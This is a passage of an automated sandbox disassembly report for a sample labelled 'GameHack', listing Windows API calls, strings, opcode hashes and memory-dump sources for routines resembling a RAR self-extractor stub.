                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 3847ffad63e580b09d672fd40cbdec73f3301ce276c93a9e069d87030be21dee
                                      • Instruction ID: bd046049473945d8213c493ba6d4cb8bd453b4f761ce52c76ae0b362687daa8d
                                      • Opcode Fuzzy Hash: 3847ffad63e580b09d672fd40cbdec73f3301ce276c93a9e069d87030be21dee
                                      • Instruction Fuzzy Hash: D411B67650010DBFCB11EF54CA52CEE3BA9FF04350B5150A5FA18AF666DA32EE51DB80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ;%u$x%u$xc%u
                                      • API String ID: 0-2277559157
                                      • Opcode ID: a981f80fb8d6fd96799a57ed88ff0b52eab932d3a9cb1eb2c30d1e7b4ef1d525
                                      • Instruction ID: 7e7ff596285469a1ab90b0c1e9ccf723555abf13f6615dde5cda7d0d65c9a197
                                      • Opcode Fuzzy Hash: a981f80fb8d6fd96799a57ed88ff0b52eab932d3a9cb1eb2c30d1e7b4ef1d525
                                      • Instruction Fuzzy Hash: 76F146706042415BDB25DF348891BEE77D9EFA0344F08646FFA85BB383DA64D846C7A2
                                      APIs
                                        • Part of subcall function 00ED130B: GetDlgItem.USER32(00000000,00003021), ref: 00ED134F
                                        • Part of subcall function 00ED130B: SetWindowTextW.USER32(00000000,00F035B4), ref: 00ED1365
                                      • EndDialog.USER32(?,00000001), ref: 00EEAD20
                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 00EEAD47
                                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00EEAD60
                                      • SetWindowTextW.USER32(?,?), ref: 00EEAD71
                                      • GetDlgItem.USER32(?,00000065), ref: 00EEAD7A
                                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00EEAD8E
                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00EEADA4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: MessageSend$Item$TextWindow$Dialog
                                      • String ID: LICENSEDLG
                                      • API String ID: 3214253823-2177901306
                                      • Opcode ID: 8ddf622cff7c568050981c51e738870aab73f7dfe86d5fc22c4de5e45ff99367
                                      • Instruction ID: 9054f55c86f0ed726b4866f649ead14d9629155efc32fa4557e888fe9dca6f18
                                      • Opcode Fuzzy Hash: 8ddf622cff7c568050981c51e738870aab73f7dfe86d5fc22c4de5e45ff99367
                                      • Instruction Fuzzy Hash: CA21073124414DBBD2255F72ED49E7B3BADFB46B5AF054028F600F25A0CB62A901F632
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00ED9448
                                      • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00ED946B
                                      • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00ED948A
                                        • Part of subcall function 00EE17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00EDBB05,00000000,.exe,?,?,00000800,?,?,00EE85DF,?), ref: 00EE17C2
                                      • _swprintf.LIBCMT ref: 00ED9526
                                        • Part of subcall function 00ED400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00ED401D
                                      • MoveFileW.KERNEL32(?,?), ref: 00ED9595
                                      • MoveFileW.KERNEL32(?,?), ref: 00ED95D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                      • String ID: rtmp%d
                                      • API String ID: 2111052971-3303766350
                                      • Opcode ID: b6abde3c4ceced626714163df55e7e450d084f893cddf7bfd18089ac1ffb1e6f
                                      • Instruction ID: b17e13b46e49cba74d489e642fd27d4977de1e11bfc420d316e53c34e401f528
                                      • Opcode Fuzzy Hash: b6abde3c4ceced626714163df55e7e450d084f893cddf7bfd18089ac1ffb1e6f
                                      • Instruction Fuzzy Hash: 58416071901158A6CB20EB60CC85ADA73BCEF15384F0454E6B559B3242EB348B8ADB60
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00EE8F38
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00EE8F59
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00EE8F80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Global$AllocByteCharCreateMultiStreamWide
                                      • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                      • API String ID: 4094277203-4209811716
                                      • Opcode ID: 81e2b96e51cfea3b46865629c520ced51a833246933725efd6e16a61498ef71a
                                      • Instruction ID: 1090da91b68096e0c07737080f8fdbfe542025e31f6df8c95c9d49085bf565b5
                                      • Opcode Fuzzy Hash: 81e2b96e51cfea3b46865629c520ced51a833246933725efd6e16a61498ef71a
                                      • Instruction Fuzzy Hash: 8531253260835D6BD724AB319C02FBB77A8AF81764F141119FA05B61D2EF749A09D3A2
                                      APIs
                                      • __aulldiv.LIBCMT ref: 00EE0A9D
                                        • Part of subcall function 00EDACF5: GetVersionExW.KERNEL32(?), ref: 00EDAD1A
                                      • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00EE0AC0
                                      • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00EE0AD2
                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00EE0AE3
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EE0AF3
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EE0B03
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EE0B3D
                                      • __aullrem.LIBCMT ref: 00EE0BCB
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                      • String ID:
                                      • API String ID: 1247370737-0
                                      • Opcode ID: 60de26f0393a26b55e5b02218d13e684d61f47fc988669fd567e3e292d3dc4cd
                                      • Instruction ID: 823e9e4600ae43c6f9adbdc8271327f5efde3bfba2fc346e4bc2a570a5150707
                                      • Opcode Fuzzy Hash: 60de26f0393a26b55e5b02218d13e684d61f47fc988669fd567e3e292d3dc4cd
                                      • Instruction Fuzzy Hash: 464139B140834A9FC310DF65C88496BFBF8FB88718F004A2EF59692650E779E589DB52
                                      APIs
                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00EFF5A2,?,00000000,?,00000000,00000000), ref: 00EFEE6F
                                      • __fassign.LIBCMT ref: 00EFEEEA
                                      • __fassign.LIBCMT ref: 00EFEF05
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00EFEF2B
                                      • WriteFile.KERNEL32(?,?,00000000,00EFF5A2,00000000,?,?,?,?,?,?,?,?,?,00EFF5A2,?), ref: 00EFEF4A
                                      • WriteFile.KERNEL32(?,?,00000001,00EFF5A2,00000000,?,?,?,?,?,?,?,?,?,00EFF5A2,?), ref: 00EFEF83
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: 0aecf1a896cc01b5deb2c3161adf98c454532e9c00c225819554bdbd2a254823
                                      • Instruction ID: 0b1babd81b00cff2d1e05de7b9bb958aa182ac66db522163c646019c175c5ffb
                                      • Opcode Fuzzy Hash: 0aecf1a896cc01b5deb2c3161adf98c454532e9c00c225819554bdbd2a254823
                                      • Instruction Fuzzy Hash: 61518171A0024D9FDB10CFA8D845AFEBBF9FF09310F14551AEA55F72A1E670AA41CB60
                                      APIs
                                      • GetTempPathW.KERNEL32(00000800,?), ref: 00EEC54A
                                      • _swprintf.LIBCMT ref: 00EEC57E
                                        • Part of subcall function 00ED400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00ED401D
                                      • SetDlgItemTextW.USER32(?,00000066,00F1946A), ref: 00EEC59E
                                      • _wcschr.LIBVCRUNTIME ref: 00EEC5D1
                                      • EndDialog.USER32(?,00000001), ref: 00EEC6B2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                      • String ID: %s%s%u
                                      • API String ID: 2892007947-1360425832
                                      • Opcode ID: df4ff471d00c0ccb33bd504edf6a91e63e065ab683805e1fe38fc3862b063962
                                      • Instruction ID: fc9fe04702399f87f190586065adb4dd6fa164ff759b1dbfd8a637ddef1a7439
                                      • Opcode Fuzzy Hash: df4ff471d00c0ccb33bd504edf6a91e63e065ab683805e1fe38fc3862b063962
                                      • Instruction Fuzzy Hash: 6A410571D0065CAADB26DBA1CC45EEA77BCEF08705F10A0A2E509F61A0E7719BC5CB50
                                      APIs
                                      • ShowWindow.USER32(?,00000000), ref: 00EE964E
                                      • GetWindowRect.USER32(?,00000000), ref: 00EE9693
                                      • ShowWindow.USER32(?,00000005,00000000), ref: 00EE972A
                                      • SetWindowTextW.USER32(?,00000000), ref: 00EE9732
                                      • ShowWindow.USER32(00000000,00000005), ref: 00EE9748
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Window$Show$RectText
                                      • String ID: RarHtmlClassName
                                      • API String ID: 3937224194-1658105358
                                      • Opcode ID: 8faf10d844b9f0be276a1e15d7bf0ee3b93d38a4b285af54b83fe413ce57798c
                                      • Instruction ID: 888a38e2533e4a869ad34f17afe88ffecc6cb4873dcaabd848117131ee316a42
                                      • Opcode Fuzzy Hash: 8faf10d844b9f0be276a1e15d7bf0ee3b93d38a4b285af54b83fe413ce57798c
                                      • Instruction Fuzzy Hash: CA31E131004248EFCB51AF65DD48B6B7BE9FF48315F00455AFE49AA163DB34D808DB61
                                      APIs
                                        • Part of subcall function 00EFBF79: _free.LIBCMT ref: 00EFBFA2
                                      • _free.LIBCMT ref: 00EFC003
                                        • Part of subcall function 00EF84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00EFBFA7,00F03958,00000000,00F03958,00000000,?,00EFBFCE,00F03958,00000007,00F03958,?,00EFC3CB,00F03958), ref: 00EF84F4
                                        • Part of subcall function 00EF84DE: GetLastError.KERNEL32(00F03958,?,00EFBFA7,00F03958,00000000,00F03958,00000000,?,00EFBFCE,00F03958,00000007,00F03958,?,00EFC3CB,00F03958,00F03958), ref: 00EF8506
                                      • _free.LIBCMT ref: 00EFC00E
                                      • _free.LIBCMT ref: 00EFC019
                                      • _free.LIBCMT ref: 00EFC06D
                                      • _free.LIBCMT ref: 00EFC078
                                      • _free.LIBCMT ref: 00EFC083
                                      • _free.LIBCMT ref: 00EFC08E
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                      • Instruction ID: 367f49ba24f52d0e2268599422793a2a584eecf178c08508e1a34381deb0d060
                                      • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                      • Instruction Fuzzy Hash: B511FC72640B0DFAD620BBB0CD06FEBB7DD6F04700F909855B3A976552DB65F9048A90
                                      APIs
                                      • GetLastError.KERNEL32(?,?,00EF20C1,00EEFB12), ref: 00EF20D8
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EF20E6
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EF20FF
                                      • SetLastError.KERNEL32(00000000,?,00EF20C1,00EEFB12), ref: 00EF2151
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: 90d77356b9beb221f7d663df3c02557ade64077fad1dd49696731017888b0f98
                                      • Instruction ID: 04ee53a4bc24a8b52e077a8e5d2ed13fb5c0d6a5665b3bf9765c600a49aec2e5
                                      • Opcode Fuzzy Hash: 90d77356b9beb221f7d663df3c02557ade64077fad1dd49696731017888b0f98
                                      • Instruction Fuzzy Hash: 6401D43221B31D6EE6642BB5BC8557A3A88FB517787211B2DF324791E0EF124C05A148
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                      • API String ID: 0-1718035505
                                      • Opcode ID: 3b1cdc7ce90b6e4d044bc3700c46e82fd69eec610e8f69967273efba1ccda3af
                                      • Instruction ID: 20ac416eaf6ac948bd82b4304ee9045e76e4dd049f88608a18789c07a1b6b13f
                                      • Opcode Fuzzy Hash: 3b1cdc7ce90b6e4d044bc3700c46e82fd69eec610e8f69967273efba1ccda3af
                                      • Instruction Fuzzy Hash: 52017D3134526E5B8F205F765C902E7B398AA417EE330363BE541F3240DE91C841F6B0
                                      APIs
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EE0D0D
                                        • Part of subcall function 00EDACF5: GetVersionExW.KERNEL32(?), ref: 00EDAD1A
                                      • LocalFileTimeToFileTime.KERNEL32(?,00EE0CB8), ref: 00EE0D31
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EE0D47
                                      • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00EE0D56
                                      • SystemTimeToFileTime.KERNEL32(?,00EE0CB8), ref: 00EE0D64
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EE0D72
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Time$File$System$Local$SpecificVersion
                                      • String ID:
                                      • API String ID: 2092733347-0
                                      • Opcode ID: 19104e034ba9e7c8b345fdc01760884c832c65af7ceac9114e00f5a0dc2649cb
                                      • Instruction ID: 8e558e0a009233a2aeb6f9db9e55350f0dde1d40f38496f5cda1a9b0db0c64e1
                                      • Opcode Fuzzy Hash: 19104e034ba9e7c8b345fdc01760884c832c65af7ceac9114e00f5a0dc2649cb
                                      • Instruction Fuzzy Hash: 7831D47A90024EEBCB00DFE5C8859EFBBBCFF58700B04455AE955E3610E730AA85CB64
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      • Opcode ID: 94039ccb5b02abce938aa8ad25ac3c6ca461d3186084b087582fa1c76c7bb4b5
                                      • Instruction ID: a06d33cd1c9293d79a0478176fdc5be84e528286dc402a12e6147662767952fe
                                      • Opcode Fuzzy Hash: 94039ccb5b02abce938aa8ad25ac3c6ca461d3186084b087582fa1c76c7bb4b5
                                      • Instruction Fuzzy Hash: A521957160024EBBDB049E12DC81FBB77EDAB54788B14A524FD09BB252E270DD41A691
                                      APIs
                                      • GetLastError.KERNEL32(?,00F10EE8,00EF3E14,00F10EE8,?,?,00EF3713,00000050,?,00F10EE8,00000200), ref: 00EF8FA9
                                      • _free.LIBCMT ref: 00EF8FDC
                                      • _free.LIBCMT ref: 00EF9004
                                      • SetLastError.KERNEL32(00000000,?,00F10EE8,00000200), ref: 00EF9011
                                      • SetLastError.KERNEL32(00000000,?,00F10EE8,00000200), ref: 00EF901D
                                      • _abort.LIBCMT ref: 00EF9023
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: 98812c61a904bbf7fdea22313770d2be07c683fe4ebc6b7ad6593cf03e64cae1
                                      • Instruction ID: 20b4b3941a971a455adefde896a0cade4bf7aa5b107876dcd5c06ee52b688882
                                      • Opcode Fuzzy Hash: 98812c61a904bbf7fdea22313770d2be07c683fe4ebc6b7ad6593cf03e64cae1
                                      • Instruction Fuzzy Hash: A6F02837605A0D6FC31133246E0AB3B399AAFC1778F392114F715F2293EE20CD026415
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00EED2F2
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00EED30C
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EED31D
                                      • TranslateMessage.USER32(?), ref: 00EED327
                                      • DispatchMessageW.USER32(?), ref: 00EED331
                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00EED33C
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 2148572870-0
                                      • Opcode ID: bd2db92db64b6eedafbac965dc26fee878571e9b10f61a2ed8dfda7ad045178a
